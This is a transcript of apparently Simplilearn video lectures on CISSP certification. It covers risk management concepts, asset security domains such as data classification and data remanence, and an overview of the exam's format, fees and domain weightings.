have a lesser loss, thus a lesser risk compared to the same risk to a CEO where the loss would be higher. So a threat could also be in multiple aspects. Threats could be natural, that means to fires, flooding, tornadoes, anything that is an act of God that can happen with minimal human interaction. Or the second threat would be man-made, where man is responsible for it, like theft, hacking, rioting, war, anything that is created by a man, or rather humans. And technical in nature could be software bugs where vulnerabilities are created, or server failures where something technical has gone wrong and you need a technical skilled person to come in and repair that particular aspect. Then the fourth one would be a supply system failure or a chain supply failure where you have dependencies. For example, any organization will have a dependency on an electricity service provider where they are providing electricity as a service which powers on the IT infrastructure. If the service provider fails and there is an electricity or a power cut, your systems are not going to work. Thus, you need a secondary mechanism to prevent that threat from being realized. Once we have identified these threats, we have identified these vulnerabilities, and we have identified the likelihood and the probability of that attack, that's where we come across the risk management exercise. Now, what is risk management? Risk management is a hypothetical exercise where we have identified a vulnerability, we have looked at the threat that it may have, and the likelihood of that threat being realized. Once we have identified the threat, the risk level, that's where the risk management comes into the picture. Reading from the slides, a core component of enterprise security program. Why? Because we need a baseline and we compare security to a baseline. For example, I've got a firewall that has been configured in a particular manner. Now, when I do a vulnerability assessment on the firewall, the vulnerability assessment gives me a report that states that some of the rules may now be redundant, thus allowing access to unauthorized users. This becomes a risk, or this becomes a threat. If this threat is identified by unauthorized people, they would then try to attack this firewall to gain access to that data which they are unauthorized to access, thus leading to losses for an organization. What is the likelihood of this happening? If the likelihood is high or low, that's what the risk management program is all about, right? And based on these risks, we implement security controls, we manage the security controls, and then we verify the security controls for future risks coming into the picture. It must be defined, and it is always defined as an ongoing project because risks will always change based on the businesses, based on the security controls that you have. This will give a guidance to an organization of how security is being implemented, how it has enhanced over a period of time, and how security mature that organization has become because of the risk assessment program. It also helps you to satisfy two aspects: due diligence and due care. What is due diligence? Due diligence is basically the research that organization does in identifying those risks and mitigating them. The due care is the actual part of mitigation where you have implemented a security control to mitigate the risk that you have identified. So if company is negligent, that means if the company doesn't have a risk management program, it is not going to be that security oriented, or the security is not going to be that great. Thus, the company may not comply to laws, regulations, and standards, thus causing them penalties, lawsuits, and other repercussions in the industry based on whatever they are doing. For risk management, we come to frameworks. The frameworks are used to categorize information systems so that we can identify threats or risks based on the classification. So this classification helps us determine the criticality and the sensitivity of information system, right? So what is the sensitivity and criticality? It basically gives us an understanding of the value of the asset that we have. So if you go back to domain 1, the asset value or the asset identification, asset security, that's where it comes into the picture. Obviously, a database server is going to be more secure than an end user laptop based on the data that they have. Thus, the criticality of the system for a database is much higher than an end user's laptop. Then we look at the security controls that can be implemented. Then for those, the frameworks like ISO 27001 comes into the picture. There is COBIT, there are a lot of frameworks out there, NIST 800-53. Then we talk about assessing the security controls. Once we have placed those security controls, we need to verify those controls are placed properly. They actually mitigate the risk and are appropriate to correctly mitigate that particular risk that they are created. Then looking at authorizing information systems, grant information systems operations based on risks determined. So you have identified risks, you have authorizing some of the devices to function in a particular manner based on which some of those risks would be mitigated or would be reduced to an acceptable level. So in the CISSP, we talk about a lot of risk assessment strategies. We look at how we can manage risks. The 4 different types of managing risks would be: one is to mitigate, other is to transfer, the third is to accept it, and the fourth one is to neglect the risk. So in the CISSP, it talks in great details about those risk assessment strategies. We are talking about the 4 types of risk mitigating strategies. They are risk avoiding or avoiding the risks, accepting the risk, transferring the risk, and limiting the risk. So in the course, we basically talk about a lot of risk strategies and how to mitigate these risks and how they can be implemented to bring down to an acceptable level. So again, risk acceptance, risk appetite of an organization comes into the picture. These terms are then discussed in the training to understand how the policies would work around the risk management strategy. Moving on, then looking at monitoring security controls. So once we have security controls in place, we have assessed them, we also need to monitor them for the effectiveness, and though they are going to create any alerts or any risks are being realized or any new risks that may be created by the security control implementation. So in these risk assessment, these are the frameworks, these are the steps that we want to follow to identify, mitigate, and monitor these risks. So the management begins with risk assessment. What do you mean by risk assessment? Identifying the impact of the risk that the risk would have on the organization. And there would be 2 different ways to assess the risk: a quantitative assessment or a qualitative assessment. A quantitative assessment is more quantifiable or is numerical in its process, where you're looking at assigning costs to particular assets and the threats. So the losses that you may figure out in a risk assessment strategy would be more numerical, where would be in a currency format, where let's say a risk, if realized, would lead to a loss of X amount of dollars. That's where the quantitative analysis comes into the picture. The qualitative analysis would be quality of a service. So if a service is being affected because of a risk, what is the degradation of that service? To what aspect is it getting degraded? For example, internet that we use. If there is an internet outage or if there is a reduction in internet speed, right? So if I've got a 10 Mbps line and now because of some fault of the ISP, it gets reduced to 4 Mbps, I may not be able to conduct the business that I was doing on a 10 Mbps line. Thus the quality of that device has degraded. Thus it is a risk and it is causing me losses, right? So qualitative risk analysis would be more descriptive in nature rather than be numerical in nature. Most of the companies or organizations would follow a hybrid policy because it is not possible to have a quantitative risk analysis in each and every scenario. Newer organization which doesn't have much data to rely on, historical data, of how threats have affected that particular organization may go in for a qualitative one, and as they mature over time in the security practices, they may then turn over to a quantitative risk analysis or a hybrid risk analysis where they're using a combination of quantitative and qualitative both. Thus, the risk controls that we were talking about: risk acceptance, risk reduction, and risk assignment. There is risk avoidance as well. So there are 4 controls. The risk reduction is where you have implemented a security control based on which the risk has been reduced to a more acceptable level. Risk assignment is where you're also known as risk avoidance. That's where you're avoiding risk by outsourcing it. So talking about risk controls again, the 4 types being accept, avoid, transfer, and reduce. Risk acceptance is where the organization is willingly accepting the risk as the way it is because they don't want to deal with it right now. They might deal with it in the next iteration, or it is at an acceptable level and the company just wants to move on. Avoiding the risk is where you are going to try to not use the service where the risk exists. Thus, avoiding is where you have identified a particular service where the risk exists and now you're not using the service to avoid the risk altogether. Risk limitation or risk reduction would be where you are implementing a security control to mitigate the risk. And then risk transference is where risk assignment comes into the picture, where you are transferring it to a third party, like outsourcing it by using insurance to limit the risk. So for example, the threat is of a fire, the risk is high, but you cannot do anything about it. So you purchase insurance. So if the fire actually happens, you would still be reimbursed for the losses that you have faced. Coming back to countermeasures, we have discussed administrative countermeasures. These are policies, rules, regulations, laws, customs that a company needs to adhere to based on the industry that they are in. Then there are technical controls, software controls, anything that is technical in nature, IDS, IPS, firewalls, encryption, anything that is going to help you implement the CIA. And then physical, where you would look at locks on doors, security guards at fences, where they're preventing access to unauthorized people. Let's talk about roles and responsibilities of management. Now, as far as management is concerned, or the hierarchy is concerned, you can see on the screen there's a senior management, the security professional, data owner, custodian, and user. Now these are from exam perspective, from the certification perspective. Obviously the hierarchy in an organization would be slightly different, but here the senior management is the responsible party for the entire security mechanism. So they must drive the entire security program. So CISSP talks about a top-down approach where the senior management has realized the importance of security and is implementing at all levels within the organization. Thus, they are a part of it and they are supporting the security program. They define the tolerance of risk of how much risk is to be tolerated by an organization from a monetary perspective or the qualitative perspective as well, depending on the laws, legislations, regulations, compliances, and the contracts that the business has signed. They will rely on security professionals to manage the risk, but the exercise and the management process has to be defined by the senior management. Once the security team comes up with the countermeasures, the senior management either approves or disapproves them based on the return on investment of that countermeasure. The security professional assists with the development of policy documents, gives their inputs because they are the people who are in the day-to-day process of dealing with these. Thus, they can identify gaps and give good inputs to modify or to create the policy in a more robust manner. The security professionals may be a part of the risk assessment and risk management team as well, especially the security technical aspects of it, assist with the implementation and maintenance of countermeasures. So the administrative, technical, or physical measures that you have identified, you may be requested to implement that. For example, the locks that we have on the door, the swipe locks, they are connected to a database where the database is maintained. So as a security professional, you wouldn't be responsible to fit those locks, but to create the database, manage and maintain the database where that information is kept upon, where people are authorized and authenticated, and would be responsible for monitoring, auditing, and security assessments as well. The data owner, the owner of that particular data part, would normally be the head of the department. For example, the sales data is normally owned by the director of sales of that department, so that they would be ultimately responsible for identifying that data, classifying that data, and accepting the security controls that are implemented. They may request for additional security controls if they deem fit. The security professional implements these security controls. Then the custodian, a person who is responsible for implementing the approved security controls or managing the day-to-day activity of the security controls. For example, the security professional has identified an access control to be implemented on a data set that the data owner owns. The data owner has approved of it. It is the custodian who is going to implement that strategy or implement the control on it. The user is basically the user who or the person who accesses the information and IT resources, does whatever access controls have been implemented, would identify the user, authenticate, authorize them, and hold them accountable for whatever they are doing. If the user is unable to authenticate, access would be denied.
In this video, we will focus on the second domain of CISSP, which is asset security. So let's understand the need for asset security through a small scenario. Well, it was yet another regular day in Tim's organization. Everything was going on fine until the organization faced a cyber attack. The hacker hacked all the servers in Tim's organization. The organization had loads of data. Not all of the data had the same level of protection. The level of protection varied from one piece of information to another. In this scenario, the hacker could hack into only that particular data which was less protected. However, this cyber attack had a huge impact on the organization. In addition to this, it was also discovered that there was some flaw in the information classification process that exposed even sensitive data to a cyber attack. In other words, even crucial data was left with very less protection. This gave rise to asset security. Asset security is defined as the process of collecting and protecting assets such as data and devices. Asset security helps an organization understand and classify data with respect to its importance, which in turn makes sure that highly valuable data receives the most protection. Asset security achieves its goals through its domains. The domains are information classification, then we have data classification, data lifecycle, data remnants, and finally we have data loss prevention. Each of these domains have different goals. All of these domains together make up asset security. Now let's have a look at each of these domains individually. First up, we have information classification. As you saw what happened in Tim's organization, it is understood that importance of data varies largely. We have to classify data before we can move on to protecting it. We need to be able to identify which is the most crucial data with respect to our organizations. Information classification is defined as the process of segregating data based on its importance to provide adequate level of protection to every piece of data. Information classification is different for each sector. Based on their objectives, the classification varies. In the general sector, information classification is used to minimize risks on crucial information, whereas in the government or military sector, it is used to prevent unauthorized access. And finally, in the commercial sector, it is used to keep sensitive information private. Here, it is seen to it that information is not disclosed to a company's competitors. Let's now move on to our second domain, that is data classification. As the name suggests, here data is basically classified based on a set of considerations. Here we will look into factors like data retention requirements, then data security requirements, data disposal methods, data encryption requirements, and finally compliance requirements. So these are the factors which are taken into consideration while classifying data. This entire process of data classification is taken care of by the data owner. In addition to the classification, they also analyze the use and value of the available data to the company. Finally, the data owner also annually reviews the data classification. Before classifying data, an important step is to understand the data lifecycle. All of us speak of data all the time. However, do we know the various steps a piece of data goes through? Well, for that, let us have a look at the third domain, data lifecycle. We will start off from the data creation step and understand what happens to the data after that. As you see on your screens, we have 6 steps in the data lifecycle stage. They are create, store, use, share, archive, and destroy. Starting off with the create phase. This is the first step in data lifecycle. Here, new data is generated or the existing data is updated. After the data is created, we use data repositories to store the created data. Without storing data, we cannot derive any information from it. Hence, this step is very crucial. In the third phase, data is viewed or used in some application or processed. In addition to data being viewed and processed, it is also shared between various users and customers. Our fifth phase is archive. Here, data which is not used frequently, that is, inactive data, is identified and then moved into long-term storage systems. And finally, we have the destroy phase. As the name suggests, data is simply destroyed here. Data can be destroyed either digitally or physically. Not to forget, you cannot simply destroy data. It should be done based on regulations. But have you wondered what happens if data is not destroyed even after we try our best to erase it? Well, this gives rise to data remnants. In simple words, data remnants is a term used for the residual of digital data which remains even after attempting to erase that particular data. Data remnants should be avoided as it is not good to have remains of a piece of data which was intended to be destroyed. Security professionals should be well versed with techniques to avoid data remnants. So how do we tackle data remnants? For this, we have various methods. They are purging, clearing, overwriting, degaussing, storing, and finally, destruction. Let's have a look at each of these methods individually and understand how they help in tackling data remnants. First up, we have purging. Purging is done to minimize risks on crucial information. In clearing, data from storage devices are removed. However, it can be reconstructed by using various softwares. Third, we have overwriting. Here, we write over the original data several times so that the original data cannot be recovered. Degaussing is the method used to destroy data on magnetic storage tapes. Next up, we have storing. Before storing data on media, the data is encrypted for the purpose of safety. Finally, the sixth method is destruction. Here, storage devices which hold the data are physically damaged. Incineration, crushing, and shredding are few of the methods used for destruction. Now let's move on to our fifth domain, data loss prevention. In this domain, various security measures are adopted that will help in making data available to only the authorized users. Here, we will look into 4 of such measures. The first measure is data inventory. In this step, data is identified and then classified. In the second step, the data flow is plotted over the lifecycle. The third measure is data protection strategy. Here, a number of risk assessments are performed. The fourth measure is implementation. In this step, we take up cases which have had a history of data loss for testing purpose. Those were the 5 domains under asset security. In addition to these, it is also required that we understand the term privacy with respect to asset security. Privacy is a very crucial aspect when it comes to asset security. Information privacy and data privacy are more or less the same. This term is used to differentiate one person from another. It relates to the personal data stored on computers. So what kind of data falls under this category? Well, we have data such as medical records, office data, financial data, etc. which fall under this category. To uphold privacy, we use technologies like pseudonymization, tokenization, and anonymization. Well, pseudonymization refers to a data management process. Anonymization refers to a process of either encrypting or removing personally identifiable data so that people who the data describes remain anonymous. And finally, in tokenization, a sensitive piece of data is substituted with a non-sensitive equivalent.
In this video, we are going to discuss the CISSP exam and its questions. What is CISSP? CISSP stands for the Certified Information Security, or rather Certified Information System Security Professional. It is considered as a gold standard in the field of information security. It is a management certification. So when you're in the senior management, this is the kind of certifications that you would require for your management skills. Now, this is a non-technical or a semi-technical certification. Here, it's nothing about vulnerability assessment or penetration testing. You're not going to do anything hands-on. You are not expected to know hacking, or you're not expected to know how to configure firewalls, antiviruses, and whatnot. It's basically something that over a period of years of experience, you have evolved a certain understanding of how security policies should be constructed, how they should be implemented, and how security affects an organization. So here you are responsible to create an overall security policy for an organization to help maintain the security posture of an organization. Now, as far as the certification is concerned, it has a validity of 3 years, after which you don't have to give the exam again. However, during these 3 years, you have to earn a certain point. So it is known as a continuing education points that ISC Square allows you to generate points by attending lectures or by attending webinars, by publishing white papers, by providing trainings. Obviously, all of these should be authorized, and you should have a validation from an authorized party that you have done this activity. Once it is verified, you will be awarded certain points. Once you have collected sufficient number of points, you will retain your certification beyond the 3 years. The passing rate of this exam is less than 50%. So it's not how much you require to score. What this basically tells you is the amount of people who actually clear the exam in the first attempt. Now, let's not get disheartened because of this. Essentially, the exam is quite tough. It's known as a mile wide and inch deep exam. That means you need to know just about everything and anything that is there to be known in information security. And that's something that we are going to discuss when we go into the 8 domains of CISSP. What happens is there are a lot of people who are not actually prepared for the exam, who think they are prepared, attempt the exam, and sadly fail in their first attempts. Some people just misjudge the exam and not prepared for it. So the fact that I'm trying to put across is be very well prepared. I've seen people who study for months together, attempt a lot of questions, ensure that their knowledge is up to the mark, and only then do they attempt the exam. Anybody can register for the exam, to be honest, and clear the exam as well. However, to get certified, there are 2 different avenues. So if you have experience of at least 5 years in 2 of the domains that are in the CISSP course, you get certified. So even if you clear the exam, there is a validation process that happens after the exam where you have to submit documentation to prove to ISC Square that you have that level of experience. And once it is proven and validated, you get certified as a CISSP. If you do not have that 5 years of experience, you get certified as an associate of ISC Square for CISSP, and they give you 6 years during which you can achieve the level of experience, prove it to them, and then get certified as a CISSP. So you can see the stringent levels that are taken for this certification. The validation is basically documentation and proof that you have to submit and which is verified. So even after you clear an exam, to get validated and get certified, it can take up to 5 to 6 weeks for ISC Square to validate and provide you with the certification. With that, let's go and see the exam. Let's have an overview of what the exam is all about. The governing body is ISC Square, that's what we have been referring to. And the professional experience, at least 4 years of college degree or additional credentials from ISC Square's approved list that will satisfy 1 year of required experience, and 5 years of paid full-time work experience in 2 or more domains. Like I said, anybody can give the exam, register for it, attempt it. Once you clear, then that's where the criteria of your work experience comes into the picture. You prove 5 years of experience, probably by a letter from your organization, from your HR saying you have this kind of experience that is relevant to the certification. They will, ISC Square will validate it, you get the certification. If you don't have that experience, you get associate of ISC Square, and then you get 6 years to attain that level of experience, after which you can get certified. The exam fees, $699, so it's an expensive exam. A single attempt for each voucher. So if you fail, that's another $700 for the second attempt. The fact being, if you fail for the first time, you cannot attempt the exam for the next 30 days. If you fail for the second time, you cannot attempt the exam again for the next 60 days. And if you fail for the third time, you cannot attempt the exam for another 90 days. So there's a cooling off period after each attempt. So I would suggest study hard, go for the first attempt, clear it, and nail it. The maintenance fees for your certification is again $85 for 3 years. The exam length is 3 hours, and the questions could vary from 100 to 150. 150 being the max questions that can be asked in that exam. You can clear the exam well before 150 questions, so be prepared for that as well. But imagine when you're walking into that exam, bear in mind that you will be asked 150 questions and you have to time those in 3 hours. 180 minutes, that's what 3 hours is. So if you do the math, not much time for every question. So it's just a minute and a half or less than that for each question. And the questions could be very descriptive, could be confusing. So you have to have your mental faculties really strong during the exam. The passing score is 700 out of a possible 1000 points. exam language is English. Testing centers, there are ISC square authorized centers where you need to book that exam. There's a huge process that you have to follow to where you go for the exam itself. So once you have registered on the ISC Square portal and you purchase the voucher, they will give you a list of centers in your vicinity that you can look into. They'll give you a calendar to give you the possible dates that you can attempt the exam on. Select the center, select the date, reach the center at least half an hour before the scheduled time. There is a verification, so you have to carry your identification, a government issued document, either a passport, driver's license, where you have to prove that you are who you say you are. And once the verification is done, only then do you get to attempt the exam. The question formats are 3 types: multiple choice, drag and drop, and hotspots. Multiple choice is the format that we are going to look at when we look at sample questions. It's the same. They give you a question, they give you 4 options. Either one or more options need to be chosen. They will specify if there is more than one answer to that particular question. In a drag and drop, it's more like match the following. So there will be a column A and column B, and they'll ask you a question and say, okay, column A gives you the options, drag and drop whichever correct answer is from column A to column B, and then submit the answer. If the answer is correct, you get awarded the points, else there is no negative marking. The third is a hotspot. Hotspot question is basically a diagram, let's say, an architectural diagram that will be presented to you, and they will ask you to pinpoint a certain aspect within that diagram. For example, they may give you an architectural overview of a network, of how it has been established, and they will ask you for a network-based firewall, which is the most likeliest area that you want the firewall to be placed in. So you don't need to know how to configure the firewall, but from an architectural perspective, you need to know where that firewall needs to be placed for it to be the most effective for the given scenario in the question. These are the domains that are asked. So you can see it basically covers anything and everything that is there in information security. It starts off with security and risk management, which weighs 15% in your questions, in your exam. So if your exam is 115 questions, 15% would be around 22 odd questions. And risk management being one of the most important topics for these kind of certifications. Then asset security, which covers 10% of your questions, so that's around 15 questions. Security architecture and engineering, this is where your infrastructural knowledge, your security architecture, your enterprise architecture, all those come into the picture. There are a lot of theoretical models that you need to study in domain 3, and that covers 13% of your exam. Communications and network security, this is the most technical topic within all these 8 topics. This is where you talk about networks, you talk about TCP/IP, you discuss protocols like TCP, UDP, you discuss different attacks, man-in-the-middle attacks, DOS attacks, and this basically has 14% of weightage. Then you have identity and access management, which basically talks about users, subjects, objects, subject being the user, object being the resource, and a relationship between these to be created where people are authorized for some activity, authenticated, and only then allowed and also held accountable for whatever activity they have done. Then you go into security assessment and testing, so vulnerability assessments, penetration test, software testing, SAS, TAST a little bit. All those will be covered in domain number 6, which has 12% weightage. Then security operations, so security operations center or the SOC, day-to-day management of incidents. So your incident management would come into the picture, problem management, change management, all of those things would come under domain 7 as security operations, which has 13% of weightage. And then finally, software development security. Now, you don't need to know development or you don't need to know any programming. There are no program-based questions. They're not going to ask you how to code. They're going to ask you how to manage a software development lifecycle or a secure software development lifecycle. So this is where your waterfall models, modified waterfall models, spiral, agile, DevOps, DevSecOps all come into the picture. And this has 10% of weightage. Now it is near about impossible for everyone or anyone to get experience across all these domains. So you will have your strong points and you will have your weak points. The task is to identify where you're good at, understand those things, make the maximum out of it, then identify your weak points and start developing on those. If you are able to look at it from a theoretical perspective, however, if you can get an internship or if you can get you can say just an insight of how it works in the practical world, it would be very helpful. Now, that being said, as far as CISSP exam is concerned, it involves a very ideal world. The real world actually doesn't come into the question because the real world will have a lot of business logic to it. By business logic, what do we mean? Every organization will modify their projects based on the expertise that they have, based on the talent that they have, and based on the people or the hierarchy of the organization that has been established. So it can be customized to each and every organization. Since an exam cannot deal with these kind of customizations, we deal with an ideal world. So for the CISSP exam, we assume that we have all the resources, we have all the people that are required. We have an hierarchy in the training which is given out, where we have roles for each and every person and job titles for each and every person, right? So when we go through the training, it is very essential that we understand what these job roles are, what their responsibilities are, so that when we get those questions, we can identify which person is going to attempt what. In the real world, things are very different. We piggyback, we take on multiple responsibilities, and that is something that CISSP doesn't adhere to. So you have to be very careful. Identify the job roles, identify the responsibilities, have that map, the hierarchical map created very well, and then try to implement the ideal world scenario from the CISSP standards to see what is going to happen. That being said, let's move on. Let's discuss the domains. Now, these domains we've already seen. What we can do is we are going to move on to the sample questions for each and every domain. Once we reach the domain, we'll see what the topics in that domain are. We'll look at the sample questions. Then we will go to the next domain, see the topics in that domain, and then look at the sample questions as well. So, what to study and those sample questions revolving them. So, looking at the first module or first domain, security and risk management. Now, this is one of the largest domains that could be debatable. For me, I would say the largest domain could be domain number 3, security architecture and engineering. Could also be domain number 4 because it is quite technical, communications and network security. And could also be security operations because that's incident management, change management, problem management all together. But each domain is very important from the exam's perspective. If you're thinking about keeping a domain for options, forget it. That's not the right way to address the exam. Let's start off with the first one, security and risk management. This domain teaches you all about information systems management, and this talks about risks and everything. So what we are going to do is we are just going to go to the official document from ISC Square where these domains and their topics are given. So that's the exam outline from ISC Square towards CISSP. This is the latest document that is there available online. You can see the URL in my browser address bar, and these are the 8 domains. This is the exam, 3 hours, number of questions 100 to 150, multiple choice and advanced innovative questions. That's where the drag and drop and the hotspot comes into the picture. Though based on experience, I can tell you that 90% of your questions will be multiple choice. 10% would either be drag and drop and hotspots. Passing grade is 700 out of 1000 points. Exam language availability is English. Those who want to attempt in other languages, it is available, but then the exam is 6 hours and the questions are 250. So that's your option depending on which language you're most comfortable with. We are going to go with English. That's the language options coming in CISSP linear exam. 6 hours, 250 questions. Everything else remains the same. These are the languages supported: French, German, Brazilian, Portuguese, Spanish, Japanese, simplified Chinese, and Korean. The weightage, I guess, remains the same. And that's the first domain, security and risk management. So what does it pertain to? Understand and apply concepts of CIA, confidentiality, integrity, and availability. In the first video, we have gone through all the 8 domains at quite some length. We have discussed what CIA is all about and how the interrelationship is. So if you want a deep dive, or rather a deeper dive than what we are doing for the domains, go back to the first video, look into that, and then you can come back to this video again. So evaluate and apply security governance principles. So we have to understand what governance is. Now, governance is basically having a overlying architectural security policy that can be integrated with an enterprise architecture, and thus having your security policy in alignment with the business goals and objectives. Security should never become a hindrance for a business. Security should always become a supporting feature which should allow the business to be executed in a secure manner. So as a security expert, our first goal is to identify what the business does, what the business processes are, what is the business trying to achieve, and then we try to create a security policy revolving these to enhance the business functionality in a overall picture. So you're looking at organizational processes, acquisitions, divestitures. Acquisition is when, let's say, scenarios where you are trying to create a security governance policy. Now the business is trying to change because they're trying to acquire another organization and merge it within this organization. And now your security policy should encompass not only your organization, but the newly acquired organization. Let's say in the next 5 years, a business decides that the newly acquired organization is no longer profitable and they want to sell it off. And now that's where the divestiture comes into the picture. You are now trying to separate the entity that you have just integrated in your security policy, and you're now trying to separate it with confidentiality, integrity, and availability of the company's data intact without affecting the organization at any point in time. Understand the fact that security is not only about hacking or getting hacked, it's about being secure at all points in time during business continuity and business, let's say, business as usual kind of activities. So that's where your security control frameworks would come in. You're going to talk about ISO 27001. We're going to talk about COBIT, PCI DSS, NIST 800 series, and so on and so forth. And the most two important statements or terms in the CISSP is due care and due diligence. Due care is you doing your own research to identify what security controls need to be implemented or what kind of governance needs to be implemented. And due diligence is you yourself spending that much time, money, effort into implementing those decisions that you have come across during the due care, thus enhancing the security functions of an organization. So when we talk about business requirements, for a business to be effective, at the same time, it needs to be legal, it needs to be compliant to regulations and laws and to the contracts that have been created by the organization. So as far as the concept goes, when we say that security needs to be in alignment with the business requirements, the business requirements imply that the business is legal, is compliant to regulations, is compliant to their contractual obligations, and is following standards that have been prescribed to them. So all of them come together, and that's where your security mapping comes into the picture. You're looking at legal and regulatory issues like cybercrimes and data breaches, licensing and intellectual property requirements, and so on and so forth. And it will also include ISC Square's Code of Professional Ethics. Now, this is a document apart from the 8 domains that we have talked about. Thus, what does this document talk about? This is the prescription from ISC Square of professional ethics for a cybersecurity professional. Expect around 4 to 5 questions from professional ethics as well. So not only is this a document that you need to read and adhere to, you will be questioned upon this in your exam, and these are easy points to score. Professional ethics, something that is ethical, something that is not against the law. So it's kind of quite easy, but the questions can be confusing, so you need to go through the entire document really well. And then your organization will have its own code of ethics. However, if you look at the hierarchy, ISC Square's ethics comes first. So your organizational ethics should not be contradictory to ISC Square's ethics in the first place. Then develop, document, and implement security policies, standards, procedures, and guidelines. Identify, analyze, and prioritize business continuity requirements. So here, that's where your risk assessment comes into the picture. If you're looking at a particular risk, that means a particular vulnerability has been identified. You want to see the likelihood of that vulnerability being exploited, and then the business impact analysis that it may have, based on which you would then create a plan to mitigate that particular risk by having a business continuity or a disaster recovery plan coming into the picture. Now, this is, as far as this domain is concerned, you're calculating the risk. It doesn't actually tell you how to mitigate that risk. That's when you go into the next future domains and discuss those technicalities. So you can see contribute and enforce personal security policies. Now, the thing about CISSP is physical security also comes into the picture. Why? Because if hardware is not well protected, there would be physical attacks, social engineering attacks that could be created, which would lead to data leakage as well. And the first and the foremost, most valuable asset of an organization is always human personnel. So CISSP would also deal with people protection in the first place. For example, protecting people against social engineering attacks, making them aware about these attacks. If there are natural calamities, you have to plan for them during your disaster recovery and business continuity plan, and ensure that people are safeguarded. Not only that, you have to tie these things up with identity and access management. For example, account creation, account management, onboarding of employees, offboarding, termination of employees, third-party contractors, consultants that you're going to hire which are not employees but third parties coming in to your organization, providing intelligence, and so on and so forth. So all of those come into the picture as well. And then that's where your risk management concepts come in. It gives you a very good overview of how to identify those risks and so on and so forth. Now, this is what the first domain is all about. It itself is very huge. And as we go ahead, we can tie this domain to the rest of the domain.
With that, we have reached the end of day 3 of our cybersecurity week. On day 4, we are going to focus on the important ethical hacking and cybersecurity interview questions. Thank you all for watching today's live session. I hope it was useful and interesting. Thanks again and see you tomorrow.
Hi there, if you like this video, subscribe to the Simplilearn YouTube channel and click here to watch similar videos. To nerd up and get certified, click here.